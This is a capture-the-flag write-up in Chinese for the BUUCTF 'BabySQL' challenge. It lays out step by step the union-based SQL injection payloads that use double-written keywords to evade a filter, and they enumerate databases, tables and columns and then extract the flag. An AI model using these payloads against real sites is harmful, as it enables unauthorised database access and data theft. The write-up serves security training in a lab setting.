BUU-WEB-[极客大挑战 2019]BabySQL

Posted TzZzEZ-web

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了BUU-WEB-[极客大挑战 2019]BabySQL相关的知识,希望对你有一定的参考价值。

[极客大挑战 2019]BabySQL

在这里插入图片描述
尝试随便登录一下,发现账户和密码全是以get方式提交。尝试在url后面添加联合查找。

?username=admin&password=pwd ' union select 1 #
#报错了。接着尝试使用双写绕过。
?username=admin&password=pwd %27 ununionion seselectlect 1 %23
#错误告诉我们列数不对,尝试到3就不报错了。
?username=admin&password=pwd %27 ununionion seselectlect 1,2,3 %23

在这里插入图片描述
通过第三列注入。
尝试爆出数据库版本。

?username=admin&password=pwd %27 ununionion seselectlect 1,2,version() %23

在这里插入图片描述
尝试爆出数据库。

?username=admin&password=pwd %27 ununionion seselectlect 1,2,database() %23

在这里插入图片描述
尝试爆出所有数据库。

#需要执行的语句是
group_concat(schema_name)from(information_schema.schemata)
#添加双写绕过,(这里有from和or被过滤了)
?username=admin&password=pwd %27 ununionion seselectlect 1,2,group_concat(schema_name)frfromom
(infoorrmation_schema.schemata) %23

(这里可以根据报错提示,添加双写字符,报错会显示错误地点,看缺少哪些字符进行添加)
在这里插入图片描述
(猜测在ctf数据库中)

#需要执行的查询语句是
group_concat(table_name) from (information_schema.tables) where table_schema="ctf"
#双写绕过
?username=admin&password=pwd %27 ununionion seselectlect 1,2,group_concat(table_name)frfromom(infoorrmation_schema.tables) whwhereere table_schema="ctf" %23

在这里插入图片描述
尝试搜寻Flag表。

?username=admin&password=pwd %27 ununionion seselectlect 1,2,group_concat(column_name) frfromom (infoorrmation_schema.columns) whwhereere table_name="Flag"%23

在这里插入图片描述
尝试查看flag中的字段。

?username=admin&password=pwd %27 ununionion seselectlect 1,2,group_concat(flag)frfromom(ctf.Flag)%23

在这里插入图片描述
成功获取flag。

以上是关于BUU-WEB-[极客大挑战 2019]BabySQL的主要内容,如果未能解决你的问题,请参考以下文章

BUU-WEB-[极客大挑战 2019]Upload

BUU-WEB-[极客大挑战 2019]PHP

BUU-WEB-[极客大挑战 2019]BuyFlag

[HCTF 2018]WarmUp&[极客大挑战 2019]Knife&[极客大挑战 2019]Secret File&[极客大挑战 2019]BuyFlag

[极客大挑战 2019]EasySQL

BUUCTF-web